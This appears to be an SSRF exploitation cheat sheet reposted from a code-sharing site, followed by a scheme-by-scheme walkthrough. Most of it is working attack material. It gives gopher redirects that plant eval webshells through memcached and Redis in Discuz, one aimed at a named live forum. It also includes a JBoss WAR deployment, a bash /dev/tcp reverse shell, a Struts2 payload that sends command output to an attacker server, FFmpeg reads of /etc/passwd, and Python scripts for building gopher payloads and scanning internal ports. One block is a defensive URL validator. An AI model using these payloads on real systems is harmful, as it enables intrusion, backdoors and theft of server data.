SSRF exploitation methods


PHP functions that can be abused for SSRF

file_get_contents()
fsockopen()
curl_exec()
readfile()

URL scheme support

SFTP

http://safebuff.com/ssrf.php?url=sftp://evil.com:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
SSH-2.0-libssh2_1.4.2

Dict

http://safebuff.com/ssrf.php?url=dict://evil.com:11111/

evil.com:$ nc -v -l 11111
Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)
CLIENT libcurl 7.40.0

gopher

// http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php
<?php
header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');
?>

evil.com:# nc -v -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)
HI
Multiline
test
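The `_HI%0AMultiline%0Atest` selector above was percent-encoded by hand. The Python below is an added example (not code from the original page) that builds gopher:// URLs from raw protocol text and reproduces the exact bytes libcurl puts on the wire for such a URL; the hosts and ports are the page's own, the function names are mine.

```python
"""gopher:// payload helpers for SSRF (added example, not from the original page).

gopher:// matters for SSRF because, after stripping the leading '/' and one
item-type byte from the path, libcurl percent-decodes the rest and writes it to
the TCP socket verbatim, followed by CRLF. Any line-oriented TCP protocol
(memcached, Redis inline commands, SMTP, or the plain text caught with nc above)
can therefore be spoken through a single URL.
"""
from urllib.parse import quote, unquote_to_bytes, urlsplit


def gopher_url(host: str, port: int, payload: str, crlf: bool = False) -> str:
    """Build a gopher URL that makes the SSRF client send `payload` to host:port.

    `payload` uses '\n' as line separator; crlf=True rewrites it to '\r\n' for
    protocols (memcached, Redis) whose parsers expect CRLF-terminated lines.
    The '_' right after the slash is the throwaway gopher item-type byte.
    """
    if crlf:
        payload = payload.replace("\n", "\r\n")
    # safe="" percent-encodes everything that is not unreserved, including space,
    # '/', '?' and quotes, so neither the vulnerable app's URL parser nor libcurl
    # can reinterpret any byte of the payload before it reaches the socket.
    return f"gopher://{host}:{port}/_{quote(payload, safe='')}"


def wire_bytes(url: str) -> bytes:
    """Reproduce what libcurl writes for a gopher URL built by gopher_url():
    the path minus '/' and the item-type byte, percent-decoded, plus the CRLF
    libcurl appends to every gopher selector."""
    path = urlsplit(url).path
    return unquote_to_bytes(path[2:]) + b"\r\n"


if __name__ == "__main__":
    url = gopher_url("evil.com", 12346, "HI\nMultiline\ntest")
    print(url)
    print(wire_bytes(url))
    # memcached wants CRLF; this is the probe used with ldap:// elsewhere on the page
    print(gopher_url("127.0.0.1", 11211, "stats\nquit\n", crlf=True))
```

Feed the returned URL through the `Location:` redirect trick shown above when the target only accepts http:// on the surface; `wire_bytes()` is handy for checking, before firing, that the decoded payload is exactly what the backend protocol parser expects.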

TFTP

http://safebuff.com/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

evil.com:# nc -v -u -l 12346
Listening on [0.0.0.0] (family 0, port 12346)
TESTUDPPACKEToctettsize0blksize512timeout6

file

http://safebuff.com/redirect.php?url=file:///etc/passwd

ldap

http://safebuff.com/redirect.php?url=ldap://localhost:11211/%0astats%0aquit

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate the serialized payload (the printed length is the byte count for the memcached set command)

<?php
$code=array('global_start'=>'@eval($_REQUEST[\'eval\']);');
echo serialize($code)."\n".strlen(serialize($code));

Output

a:1:{s:12:"global_start";s:25:"@eval($_REQUEST['eval']);";} // serialized data
59 // string length

webshell.php

<?php
// gopher can be replaced by any of the other schemes shown above
header('Location: gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a');
?>

back.php

<?php
header('Location: gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a');
?>

Example: Discuz

Open the following URLs in order (the first poisons the cache, the second triggers it)

http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myvps/webshell.php?logo.jpg[/img]
http://bbs.biligame.com/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

Clean up (back.php deletes the key)

http://bbs.biligame.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://myserver/back.php?logo.jpg[/img]

Backdoor URL

http://bbs.biligame.com/data/cache/hello.php

SSRF Redis Getshell

Generate the serialized payload

<?php
$a['output']['preg']['search']['plugins'] = '/.*/e';
// double quotes inside the single-quoted literal; nested single quotes would not parse
$a['output']['preg']['replace']['plugins'] = '@eval($_POST["c"]);';
$a['rewritestatus'] = 1;
$setting = serialize($a);
echo $setting."\n".strlen($setting);
?>

Output

a:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";a:1:{s:7:"plugins";s:5:"/.*/e";}s:7:"replace";a:1:{s:7:"plugins";s:19:"@eval($_POST["c"]);";}}}s:13:"rewritestatus";i:1;} // serialized data
173 // string length

Example: Discuz

Open this URL (poisons the cache)

http://192.168.80.116/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://you-vps-ip/ssrf.php?.jpg[/img]&formhash=818c8f44

Trigger URL (loads the poisoned cache)

http://192.168.80.116/forum.php?mod=ajax&inajax=yes&action=getthreadtypes

FFmpeg

cat test.jpg

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

subfile (read the file in byte ranges, one segment per range)

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,0,end,64,,:///etc/passwd
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,64,end,128,,:///etc/passwd
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,128,end,256,,:///etc/passwd
#EXTINF:10.0,
concat:http://localhost/header.m3u8|subfile,,start,256,end,512,,:///etc/passwd
#EXT-X-ENDLIST

PostgreSQL

Exploit

> SELECT dblink_send_query('host=127.0.0.1 dbname=quit user=\'\nstats\n\' password=1 port=11211 sslmode=disable','select version();');

MongoDB

Exploit

> db.copyDatabase("\1\2\3\4\5\6\7",'test','localhost:8000')
> nc -l 8000 | hexdump -C
> db.copyDatabase("\nstats\nquit",'test','localhost:11211')

CouchDB

exploit

http://localhost:5984/_users/_all_docs
HTTP/1.1 200 OK
Server: CouchDB/1.2.0 (Erlang OTP/R15B01)
ETag: "BD1WV12007V05JTG4X6YHIHCA"
Date: Tue, 18 Dec 2012 21:39:59 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: must-revalidate

{"total_rows":1,"offset":0,"rows":[
{"id":"_design/_auth","key":"_design/_auth","value":{"rev":"1-a8cfb993654bcc635f126724d39eb930"}}
]}

An attacker can also make the CouchDB server send requests into the intranet through its replication function:

POST http://couchdb:5984/_replicate
Content-Type: application/json
Accept: application/json

{
"source" : "recipes",
"target" : "http://ssrf-me:11211/recipes"
}

JBoss

JBoss POC

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://our_public_internet_server/utils/cmd.war

Write a shell

http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
upfile=http://10.0.0.1:8080/jmx-console/HtmlAdaptor?action=invokeOp%26name=jboss.system%3Aservice%3DMainDeployer%26methodIndex=3%26arg0=http%3A%2F%2Fremote-host%2Fhtml5.war%23.jpg
http://target.com/ueditor/jsp/getRemoteImage.jsp
POST:
upfile=http://intranet-ip:8080/html5/023.jsp%23.jpg

reverse shell

bash -i >& /dev/tcp/123.45.67.89/9999 0>&1

Weblogic

gopher.php

<?php
header("Location:gopher://vps-ip:2333/_test");
?>

vuln website

https://example.com/uddiexplorer/SearchPublicRegistries.jsp
POST:
operator=http://vps-ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

vps

> nc -lvv 2333

Connection from xx.xx.xx.xx port 2333 [tcp/snapp] accepted

Local File Read

http://www.xxx.com/redirect.php?url=file:///etc/passwd
http://www.xxx.com/redirect.php?url=file:///C:/Windows/win.ini

Bool (blind) SSRF

Struts2-016 POC

?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'command'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://SERVER/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
// replace SERVER with your VPS address; the command output arrives as a GET request and can be read in the VPS access.log

SSRF Proxy

SSRF_Proxy

ssrfsocks

Once an SSRF vulnerability has been found, the first thing to do is test every URL scheme the fetcher supports:

  • file:///
  • dict://
  • sftp://
  • ldap://
  • tftp://
  • gopher://
 

####file://

This scheme reads files from the server's file system:

http://example.com/ssrf.php?url=file:///etc/passwd

http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

If the server blocks outbound HTTP requests to external sites, or protects the fetcher with a whitelist, one of the schemes below is often enough to get around the restriction:

 

####dict://

This scheme refers to definitions or word lists served over the DICT protocol. For SSRF the content is irrelevant: the client opens a TCP connection to the host and port we name and sends its greeting, which makes dict:// a convenient connect probe and, as the capture shows, leaks the client library version:

http://example.com/ssrf.php?url=dict://evil.com:1337/

evil.com:$ nc -lvp 1337

Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)

CLIENT libcurl 7.40.0

 

####sftp://

SFTP stands for SSH File Transfer Protocol (or Secure File Transfer Protocol), a separate protocol bundled with SSH that runs over an encrypted connection and behaves much like FTP. The client starts with an SSH handshake, so the listener sees the library banner:

http://example.com/ssrf.php?url=sftp://evil.com:1337/

evil.com:$ nc -lvp 1337

Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)

SSH-2.0-libssh2_1.4.2

####ldap:// or ldaps:// or ldapi://

LDAP stands for Lightweight Directory Access Protocol, an application protocol for managing and accessing distributed directory information services over IP networks. The %0a-separated words in the path are sent as raw lines, which is how the memcached commands below reach port 1337:

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit

http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit

http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit

 

####tftp://

TFTP (Trivial File Transfer Protocol) is a simple lockstep file transfer protocol that lets a client get a file from, or put a file on, a remote host. It runs over UDP, so it is one of the few schemes that lets an SSRF reach UDP services:

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

evil.com:# nc -lvup 1337

Listening on [0.0.0.0] (family 0, port 1337)

TESTUDPPACKEToctettsize0blksize512timeout3

 

####gopher://

Gopher is a distributed document delivery service that lets users browse, search and retrieve information held at different locations. For SSRF it is especially useful: everything after the item-type character in the path is written to the TCP socket as-is, so arbitrary line-based protocol traffic can be sent. Because many fetchers only accept http:// up front, the gopher URL is delivered through a redirect:

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

gopher.php (host it on attacker.com):

<?php

  header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');

?>

evil.com:# nc -lvp 1337

Listening on [0.0.0.0] (family 0, port 1337)

Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)

Hi

ssrf

test
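The scheme walkthrough above is also the checklist for the defender. As an added example (not code from the original article), the Python below is the allowlist check a server-side fetcher should apply before, and on every redirect hop of, an outbound request: only http/https, no credentials in the URL, and no address that is not publicly routable. The hostnames in the constructed resolver table are mine, as are the function names; the resolver is injectable so the check can be exercised offline.

```python
"""Allowlist check for a server-side URL fetcher (added example, not from the original article).

Rejects every scheme other than http/https, URLs carrying credentials, and any host
that resolves to a non-public address: loopback, RFC 1918, link-local (the cloud
metadata service lives at 169.254.169.254), multicast, unspecified and reserved
ranges, including IPv4-mapped IPv6 forms such as ::ffff:127.0.0.1.
"""
import ipaddress
import socket
from typing import Callable, Iterable, Set
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def dns_resolve(host: str) -> Set[str]:
    """Every A/AAAA answer, not just the first: an attacker-controlled zone can mix a
    public and a private address so that a first-answer check passes. getaddrinfo also
    normalises forms like 2130706433 or 0x7f000001 into dotted addresses for us."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped            # ::ffff:10.0.0.5 is still 10.0.0.5
    # is_global already excludes loopback, private, link-local, unspecified and
    # reserved space; multicast is added explicitly because older Pythons treat
    # 224.0.0.0/4 as global.
    return not addr.is_global or addr.is_multicast


def is_safe_url(url: str, resolve: Callable[[str], Iterable[str]] = dns_resolve) -> bool:
    """True only for http(s) URLs whose host resolves exclusively to public addresses.

    Run it on every hop: the gopher.php trick above passes a check on the first URL
    and smuggles the real target in a 302 Location header, so the fetcher must not
    follow redirects automatically, or must re-validate each one.
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return False
    if parts.username is not None or parts.password is not None:
        return False                        # http://trusted.example@10.0.0.5/ confusion
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IP: no DNS involved
    except ValueError:
        try:
            addrs = set(resolve(host))
        except (socket.gaierror, OSError):
            return False
    return bool(addrs) and not any(is_internal(a) for a in addrs)


# Constructed resolver table so the check can be exercised without network access.
DEMO_ZONE = {
    "public.example": {"93.184.216.34"},
    "rebind.example": {"93.184.216.34", "10.0.0.5"},   # mixed answers: must be rejected
}


def demo_resolve(host: str) -> Set[str]:
    if host not in DEMO_ZONE:
        raise socket.gaierror(f"constructed zone has no record for {host}")
    return DEMO_ZONE[host]


if __name__ == "__main__":
    for u in ("file:///etc/passwd", "dict://evil.com:1337/", "http://169.254.169.254/",
              "http://rebind.example/", "http://public.example/"):
        print(f"{u:40} {'allowed' if is_safe_url(u, demo_resolve) else 'blocked'}")
```

The check resolves the name once; the fetcher must then connect to the address that was validated (pin it) rather than resolve again, otherwise a short-TTL record can point to a public address during the check and to 127.0.0.1 during the connect.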

 

###Scanning the internal network and ports

What if the target runs services on its LAN (Kibana, Elasticsearch, MongoDB and so on) that we cannot reach directly from the Internet because a firewall blocks them?

We can use the SSRF vulnerability to reach them instead.

An attacker can enumerate internal IP addresses and scan their ports, learn more about the target, and use that knowledge for further attacks.

Sometimes this even leads to remote code execution.

Example: the attacker finds an internal host running outdated software with a publicly known RCE vulnerability; the SSRF lets them reach that host and exploit it. The same applies to other classes of vulnerability.
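The scan described above sees nothing but the vulnerable server's own reply, so it comes down to classifying that reply. As an added example (not code from the original article), the Python below drives an SSRF endpoint of the `ssrf.php?url=` shape used on this page over a host and port list and sorts each probe into open, closed or filtered from three signals: the backend error string echoed into the body, the round-trip time, and whether any body came back at all. The endpoint, target ranges, timeout value and error markers are assumptions; `fetch` is injected so the logic runs offline against a constructed fake intranet.

```python
"""Internal port scan through an SSRF endpoint (added example, not from the original article)."""
import time
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional
from urllib.parse import quote, unquote, urlsplit

CONNECT_TIMEOUT = 5.0   # assumed outbound connect timeout of the vulnerable fetcher
REFUSED_MARKERS = ("connection refused", "couldn't connect to server", "failed to connect")
TIMEOUT_MARKERS = ("timed out", "timeout was reached", "no route to host")


@dataclass
class Probe:
    status: Optional[int]   # HTTP status of the SSRF endpoint's own reply, None if none
    body: str               # its body, which often embeds the backend error text
    elapsed: float          # wall-clock seconds for the round trip


def classify(p: Probe) -> str:
    text = p.body.lower()
    if any(m in text for m in REFUSED_MARKERS):
        return "closed"        # RST came back quickly: host alive, nothing listening
    if p.elapsed >= CONNECT_TIMEOUT or any(m in text for m in TIMEOUT_MARKERS):
        return "filtered"      # dropped by a firewall, or no such host
    if p.status is None:
        return "unknown"       # the SSRF endpoint itself failed; retry later
    return "open"              # something accepted the connection and answered


def target_url(endpoint: str, host: str, port: int) -> str:
    # Percent-encode the inner URL so its ':' and '/' survive as one parameter value.
    return endpoint + quote(f"http://{host}:{port}/", safe="")


def http_fetch(url: str) -> Probe:
    """Real fetch through the SSRF endpoint, with timing."""
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=CONNECT_TIMEOUT + 2) as r:
            return Probe(r.status, r.read(4096).decode("utf-8", "replace"),
                         time.perf_counter() - start)
    except urllib.error.HTTPError as e:
        return Probe(e.code, e.read(4096).decode("utf-8", "replace"),
                     time.perf_counter() - start)
    except (urllib.error.URLError, OSError) as e:
        return Probe(None, str(e), time.perf_counter() - start)


def scan(endpoint: str, hosts: Iterable[str], ports: Iterable[int],
         fetch: Callable[[str], Probe] = http_fetch) -> Dict[str, str]:
    return {f"{h}:{p}": classify(fetch(target_url(endpoint, h, p)))
            for h in hosts for p in ports}


# Constructed fake intranet for offline use: (host, port) -> what the SSRF page echoes.
FAKE_INTRANET = {
    ("10.0.0.5", 80): Probe(200, "<html><title>Kibana</title>", 0.04),
    ("10.0.0.5", 9200): Probe(200, '{"name":"node-1","cluster_name":"es"}', 0.05),
    ("10.0.0.5", 27017): Probe(200, "curl: (56) Recv failure", 0.03),   # open, not HTTP
}


def fake_fetch(url: str) -> Probe:
    inner = urlsplit(unquote(url.split("url=", 1)[1]))
    key = (inner.hostname, inner.port)
    if key in FAKE_INTRANET:
        return FAKE_INTRANET[key]
    if inner.hostname == "10.0.0.5":     # live host, port closed: immediate refusal
        return Probe(200, "curl: (7) Failed to connect to 10.0.0.5: Connection refused", 0.02)
    return Probe(200, "curl: (28) Connection timed out", CONNECT_TIMEOUT)   # no such host


if __name__ == "__main__":
    for target, state in scan("http://safebuff.com/ssrf.php?url=",
                              ["10.0.0.5", "10.0.0.9"], [80, 9200, 27017, 22],
                              fake_fetch).items():
        print(f"{target:18} {state}")
```

Against a real endpoint, calibrate first: probe one port you know is closed and one you know is open and adjust `CONNECT_TIMEOUT` and the marker lists to what that particular fetcher echoes; blind endpoints that return a fixed page leave only the timing signal, which is the "Bool SSRF" case from the cheat sheet above.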





 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM